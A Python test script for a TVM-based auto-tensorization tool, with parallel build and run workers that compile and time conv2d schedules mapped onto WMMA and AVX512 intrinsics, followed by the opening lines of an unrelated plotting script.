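#   results = native_local_builder_build(schedule_app, params_lst,
#                                        "cuda", "llvm", timeout=15, n_parallel=4)
# where each BuildResult carries (filename, args, error_no, error_msg, time_cost);
# the "cuda"/"llvm" targets here are illustrative, not fixed by this file.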
# this is similar to auto_scheduler
def native_local_run_worker():
global GLOBAL_RUN_INPUTS
(
target,
dev_id,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose,
) = GLOBAL_RUN_INPUTS
def timed_func(build_res):
tic = time.time()
error_no = 0
error_msg = None
if build_res.error_no != auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
return (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
try:
func = module.load_module(build_res.filename)
ctx = ndarray.context(str(target), dev_id)
# Limitation:
# We can not get PackFunction directly in the remote mode as it is wrapped
# under the std::function. We could lift the restriction later once we fold
# the PackedFunc as an object. Currently, we pass function name to work
# around it.
f_prepare = "cache_flush_cpu_non_first_arg" if enable_cpu_cache_flush else ""
time_f = func.time_evaluator(
func.entry_name,
ctx,
number=number,
repeat=repeat,
min_repeat_ms=min_repeat_ms,
# f_preproc=f_prepare,
)
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
if error_no == 0:
try:
args = [
ndarray.empty(auto_scheduler.utils.get_const_tuple(x.shape), x.dtype, ctx) for x in build_res.args
]
random_fill = tvm.get_global_func("tvm.contrib.random.random_fill", True)
assert random_fill, "Please make sure USE_RANDOM is ON in the config.cmake"
for arg in args:
random_fill(arg)
ctx.sync()
costs = time_f(*args).results
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.RUNTIME_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
shutil.rmtree(os.path.dirname(build_res.filename))
toc = time.time()
time.sleep(cooldown_interval)
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print("*Y", end="", flush=True)
else:
print("*E", end="", flush=True) # Run error
return (costs, error_no, error_msg, toc - tic + build_res.time_cost, toc)
measure_results = []
for build_res in build_results:
if build_res.error_no != 0:
res = (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
else:
res = auto_scheduler.utils.call_func_with_timeout(timeout, timed_func, args=(build_res,))
if isinstance(res, TimeoutError):
if verbose >= 1:
print("*T", end="") # Run timeout
res = (
(MAX_FLOAT,),
auto_scheduler.measure.MeasureErrorNo.RUN_TIMEOUT,
None,
build_res.time_cost + timeout,
time.time(),
)
measure_results.append(auto_scheduler.measure.MeasureResult(*res))
if verbose >= 1:
print("", flush=True)
return measure_results
@register_test
def test2():
print("##########################")
print("Test 2")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 0, 0, 0, 0, 0, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params_lst = []
trials = 10
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
my_params = {
'vectorize': (1, 1),
'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
'output_unroll_step': (64, -1),
'last_unroll_step': (512, 1)}
params.from_json(my_params)
params_lst.append(params)
global GLOBAL_BUILD_INPUTS
global GLOBAL_RUN_INPUTS
build_func = "default"
target_host = "llvm"
timeout = 15
verbose = 1
    GLOBAL_BUILD_INPUTS = (
        schedule_app,
        params_lst,
        build_func,
        hw_abs_dag.target,
        target_host,
        timeout,
        verbose
    )
build_results = native_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func,
verbose=verbose)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
GLOBAL_RUN_INPUTS = (
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
run_results = native_local_run_worker()
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
def pebble_local_build_worker(index):
"""
    Build function of LocalBuilder to be run in the Builder thread pool.
Parameters
----------
index : int
The MeasureInput index to be processed by the current Builder thread.
Returns
-------
res : BuildResult
The build result of this Builder thread.
"""
global GLOBAL_BUILD_INPUTS
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
if not GLOBAL_BUILD_INPUTS:
raise ValueError("GLOBAL_BUILD_INPUTS not found")
(
sch_app,
params_lst,
build_func,
name,
target,
target_host,
timeout,
verbose
) = GLOBAL_BUILD_INPUTS
assert isinstance(build_func, str)
if build_func == "default":
build_func = tar.tar
elif build_func == "ndk":
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
def timed_func():
tic = time.time()
params = params_lst[index]
target_dag = sch_app.target_dag
inputs = target_dag.get_inputs()
sch = tvm.te.create_schedule([x.op for x in target_dag.tensors])
error_no = auto_scheduler.measure.MeasureErrorNo.NO_ERROR
error_msg = None
args = inputs + list(target_dag.tensors)
try:
sch = sch_app.apply(sch, params)
print(tvm.lower(sch, args, simple_mode=True))
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.INSTANTIATION_ERROR
error_msg = auto_scheduler.measure.make_error_msg()
print(error_msg)
if error_no == 0:
dirname = tempfile.mkdtemp()
filename = os.path.join(dirname, "tmp_func." + build_func.output_format)
try:
# TODO(merrymercy): Port the unroll pass.
with transform.PassContext():
func = build_module.build(
sch, args, target=target, target_host=target_host,
name=name
)
func.export_library(filename, build_func)
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST
error_msg = auto_scheduler.measure.make_error_msg()
else:
filename = ""
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print(".Y", end="", flush=True)
else:
print(".E", end="", flush=True) # Build error
return (filename, args, error_no, error_msg, time.time() - tic)
return timed_func()
def pebble_local_builder_build(
sch_app, params_lst, target, target_host, timeout, n_parallel,
build_func="default", verbose=1, name="main"):
"""
    Build function of LocalBuilder to build the MeasureInputs into runnable modules.
Parameters
----------
inputs : List[MeasureInput]
The MeasureInputs to be built.
timeout : int
The timeout limit (in second) for each build thread.
This is used in a wrapper of the multiprocessing.Process.join().
n_parallel : int
Number of threads used to build in parallel.
build_func : str = 'default'
The name of build function to process the built module.
verbose: int = 1
Verbosity level. 0 for silent, 1 to output information during program building.
Returns
-------
res : List[BuildResult]
The build results of these MeasureInputs.
"""
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
global GLOBAL_BUILD_INPUTS
GLOBAL_BUILD_INPUTS = (
sch_app, params_lst, build_func, name,
target, target_host, timeout, verbose)
with ProcessPool(n_parallel) as pool:
future = pool.map(pebble_local_build_worker, range(len(params_lst)), timeout=timeout)
iterator = future.result()
results = []
while True:
try:
result = next(iterator)
except StopIteration:
break
except TimeoutError as error:
if verbose >= 1:
print(".T", end="", flush=True)
result = None, [], auto_scheduler.measure.MeasureErrorNo.BUILD_TIMEOUT, None, timeout
except Exception as error:
if verbose >= 1:
print(".F", end="", flush=True)
result = None, [], auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST, None, timeout
results.append(auto_scheduler.measure.BuildResult(*result))
if verbose >= 1:
print("", flush=True)
return results
# this is similar to auto_scheduler
def pebble_local_run_worker(index):
global GLOBAL_RUN_INPUTS
(
target,
dev_id,
build_results,
name,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose,
) = GLOBAL_RUN_INPUTS
def timed_func(build_res):
if build_res.error_no != 0:
res = (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
return res
tic = time.time()
error_no = 0
error_msg = None
if build_res.error_no != auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
return (
(MAX_FLOAT,),
build_res.error_no,
build_res.error_msg,
build_res.time_cost,
time.time(),
)
try:
func = module.load_module(build_res.filename)
ctx = ndarray.context(str(target), dev_id)
# Limitation:
# We can not get PackFunction directly in the remote mode as it is wrapped
# under the std::function. We could lift the restriction later once we fold
# the PackedFunc as an object. Currently, we pass function name to work
# around it.
f_prepare = "cache_flush_cpu_non_first_arg" if enable_cpu_cache_flush else ""
time_f = func.time_evaluator(
func.entry_name if name is None else name,
ctx,
number=number,
repeat=repeat,
min_repeat_ms=min_repeat_ms,
# f_preproc=f_prepare,
)
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
if error_no == 0:
try:
args = [
ndarray.empty(auto_scheduler.utils.get_const_tuple(x.shape), x.dtype, ctx) for x in build_res.args
]
random_fill = tvm.get_global_func("tvm.contrib.random.random_fill", True)
assert random_fill, "Please make sure USE_RANDOM is ON in the config.cmake"
for arg in args:
random_fill(arg)
ctx.sync()
costs = time_f(*args).results
# pylint: disable=broad-except
except Exception:
costs = (MAX_FLOAT,)
error_no = auto_scheduler.measure.MeasureErrorNo.RUNTIME_DEVICE
error_msg = auto_scheduler.measure.make_error_msg()
shutil.rmtree(os.path.dirname(build_res.filename))
toc = time.time()
time.sleep(cooldown_interval)
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print("*Y", end="", flush=True)
else:
print("*E", end="", flush=True) # Run error
return (costs, error_no, error_msg, toc - tic + build_res.time_cost, toc)
return timed_func(build_results[index])
def pebble_local_runner_run(
target,
dev_id,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose=1,
name="main"):
global GLOBAL_RUN_INPUTS
GLOBAL_RUN_INPUTS = (
target,
dev_id,
build_results,
name,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
measure_results = []
with ProcessPool(1) as pool:
future = pool.map(pebble_local_run_worker, range(len(build_results)), timeout=timeout)
iterator = future.result()
while True:
try:
result = next(iterator)
except StopIteration:
break
except TimeoutError:
if verbose >= 1:
print("*T", end="", flush=True) # Run timeout
result = (
(MAX_FLOAT,),
auto_scheduler.measure.MeasureErrorNo.RUN_TIMEOUT,
None,
timeout + timeout,
time.time(),
)
except Exception as error:
if verbose >= 1:
print("*F", end="", flush=True) # Run fatal error
result = (
(MAX_FLOAT,),
auto_scheduler.measure.MeasureErrorNo.RUNTIME_DEVICE,
None,
timeout + timeout,
time.time(),
)
measure_results.append(
auto_scheduler.measure.MeasureResult(*result))
if verbose >= 1:
print("", flush=True)
return measure_results
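# Hedged usage sketch: the runner consumes BuildResults and measures each module
# on the chosen device, e.g.
#   run_results = pebble_local_runner_run(target, 0, build_results, timeout=15,
#       number=1, repeat=1, min_repeat_ms=150, cooldown_interval=1,
#       enable_cpu_cache_flush=1)
# returning one MeasureResult per BuildResult; the argument values mirror the
# tests above and are not the only valid settings.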
@register_test
def test3():
print("##########################")
print("Test 3")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1, 1, 1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params_lst = []
trials = 32
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
# my_params = {
# 'vectorize': (1, 1),
# 'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
# 'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
# 'last_factors': [([-1, 32], (-1,))],
# 'output_unroll_step': (64, -1),
# 'last_unroll_step': (512, 1)}
# params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm"
timeout = 15
verbose = 1
build_results = pebble_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func,
verbose=verbose)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
def tg_parallel_build_worker(name):
global GLOBAL_BUILD_INPUTS
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
if not GLOBAL_BUILD_INPUTS:
raise ValueError("GLOBAL_BUILD_INPUTS not found")
(
sch_app,
params_lst,
build_func,
target,
target_host,
verbose
) = GLOBAL_BUILD_INPUTS
assert isinstance(build_func, str)
if build_func == "default":
build_func = tar.tar
elif build_func == "ndk":
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
target_dag = sch_app.target_dag
inputs = target_dag.get_inputs()
args = inputs + list(target_dag.tensors)
schs = []
err_nos = []
err_msgs = []
filenames = []
rets = []
tic = time.time()
for i, params in enumerate(params_lst):
sch = tvm.te.create_schedule([x.op for x in target_dag.tensors])
try:
sch = sch_app.apply(sch, params)
schs.append(sch)
err_nos.append(auto_scheduler.measure.MeasureErrorNo.NO_ERROR)
err_msgs.append(None)
except Exception:
err_nos.append(auto_scheduler.measure.MeasureErrorNo.INSTANTIATION_ERROR)
err_msgs.append(auto_scheduler.measure.make_error_msg())
filenames.append("")
if schs:
mod_err_nos = []
mod_err_msgs = []
mods = tg.parallel_build(
schs, args, target=target, target_host=target_host, name=name)
p_mod = 0
for i, err in enumerate(err_nos):
if err == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
mod = mods[p_mod]
p_mod += 1
if mod is None:
if verbose >= 1:
print(".E", end="", flush=True)
mod_err_nos.append(
auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST
)
mod_err_msgs.append(
"Build error in tg.parallel_build"
)
else:
if verbose >= 1:
print(".Y", end="", flush=True)
mod_err_nos.append(err)
mod_err_msgs.append(err_msgs[i])
dirname = tempfile.mkdtemp()
filename = os.path.join(
dirname, "tmp_func." + build_func.output_format)
filenames[i] = filename
mod.export_library(filename, build_func)
else:
if verbose >= 1:
print(".I", end="", flush=True)
mod_err_nos.append(err)
mod_err_msgs.append(err_msgs[i])
err_nos = mod_err_nos
err_msgs = mod_err_msgs
toc = time.time()
for no, msg, filename in zip(err_nos, err_msgs, filenames):
rets.append(
(
filename, args, no, msg, toc - tic
)
)
if verbose >= 1:
print("", flush=True)
return rets
def tg_parallel_builder_build(
sch_app, params_lst, target, target_host,
build_func="default", timeout=150, verbose=1, name="main"):
global GLOBAL_BUILD_INPUTS
GLOBAL_BUILD_INPUTS = (
sch_app,
params_lst,
build_func,
target,
target_host,
verbose
)
with ProcessPool(1) as pool:
future = pool.map(tg_parallel_build_worker, [name], timeout=timeout)
iterator = future.result()
while True:
try:
results = next(iterator)
except StopIteration:
break
except TimeoutError as error:
if verbose >= 1:
print("Build Timeout.", flush=True)
results = [
(None, [],
auto_scheduler.measure.MeasureErrorNo.BUILD_TIMEOUT,
None, timeout) for i in range(len(params_lst))]
except Exception as error:
if verbose >= 1:
print("Build Fatal Error\n",
auto_scheduler.measure.make_error_msg(), flush=True)
results = [
(None, [],
auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST,
None, timeout) for i in range(len(params_lst))]
results = [auto_scheduler.measure.BuildResult(*x) for x in results]
return results
@register_test
def test4():
print("##########################")
print("Test 4")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1, 1, 1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params_lst = []
trials = 32
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
# my_params = {
# 'vectorize': (1, 1),
# 'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
# 'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
# 'last_factors': [([-1, 32], (-1,))],
# 'output_unroll_step': (64, -1),
# 'last_unroll_step': (512, 1)}
# params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm"
timeout = 150
verbose = 1
build_results = tg_parallel_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout=timeout,
build_func=build_func,
verbose=verbose)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
@register_test
def test5():
print("##########################")
print("Test 5")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "16x16x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1, with_bias=False)
target_dag = at.compute_dag_from_tensors([E])
# inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
print(tvm.lower(sch_ref, [A, B, E], simple_mode=True))
# func_ref = tvm.build(sch_ref, inputs_ref +
# list(target_dag.tensors), "llvm")
# ctx = tvm.cpu()
# inputs_np_arrays = get_np_arrays(inputs_ref)
# inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
# outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
# func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1, 1, 1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.CUDAScheduleGeneratorSplitK(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplierSplitK(match_result, sc_info)
params_lst = []
trials = 1
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
my_params = {
'split_K': (4, 0),
'inline': (0, 1),
'vectorize': (1, 1),
'spatial_factors': [([2, 1, 1, 2], (0, 0)), ([4, 1, 1, 2], (-1, 1)), ([14, 1, 1, 1], (-1, -1))],
'reduce_factors': [([3, 2, 2], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
'output_unroll_step': (64, -1),
'last_unroll_step': (512, 1)}
params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm"
timeout = 150
verbose = 1
# build_results = tg_parallel_builder_build(
# schedule_app,
# params_lst,
# hw_abs_dag.target,
# target_host,
# timeout=timeout,
# build_func=build_func,
# verbose=verbose)
build_results = pebble_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
@register_test
def test6():
print("##########################")
print("Test 6")
hw_abs_dag = at.AVX512SkylakeGemvhw_abs_dag()
compute_key = "dummy"
shape_key = "16x4"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1, with_bias=False, in_dtype=["uint8", "int8"], out_dtype="int32")
target_dag = at.compute_dag_from_tensors([E])
# inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
print(tvm.lower(sch_ref, [A, B, E], simple_mode=True))
# func_ref = tvm.build(sch_ref, inputs_ref +
# list(target_dag.tensors), "llvm")
# ctx = tvm.cpu()
# inputs_np_arrays = get_np_arrays(inputs_ref)
# inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
# outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
# func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [k, k, k],
kk: [rc, rr, rs]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.LLVMScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.LLVMScheduleApplier(match_result, sc_info)
params_lst = []
trials = 1
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
my_params = {
'inline': (0, 1),
'vectorize': (1, 1),
'spatial_factors': [([2, 1], (0, 0)), ([4, 1], (-1, 1)), ([14, 1], (-1, -1)), ([14, 1], (-1, -1))],
'reduce_factors': [([3, 2], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
}
params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm -mcpu=skylake-avx512"
timeout = 150
verbose = 1
# build_results = tg_parallel_builder_build(
# schedule_app,
# params_lst,
# hw_abs_dag.target,
# target_host,
# timeout=timeout,
# build_func=build_func,
# verbose=verbose)
build_results = pebble_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--case", help="test case", type=int, default=1)
parser.add_argument("--all", help="test all", action="store_true")
args = parser.parse_args()
if args.all:
for k, v in TEST_CASES.items():
print("############################################")
print("test", k)
v()
print("Pass!")
else:
assert args.case in TEST_CASES, "Can't find case %s." % (
str(args.case))
case = TEST_CASES[args.case]
case()
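# Usage (script name hypothetical):
#   python this_test.py --case 4    # run one registered case from TEST_CASES
#   python this_test.py --all       # run every registered case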
[record boundary — remaining per-file quality-signal columns omitted]
[next record: triangular_lattice/diecutting/result_N_ave.py — repo ssh0/growing-string, blob 8a248160aecd030fbd680720ecb8edc8ce0e858d, head 2e43916e91157dfb4253775149b35ec9d81ef14d, Python, 14,476 bytes, MIT, 1 star (2016-04-14 – 2016-04-27)]
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# written by Shotaro Fujimoto
# 2016-12-06
import matplotlib
import matplotlib.pyplot as plt
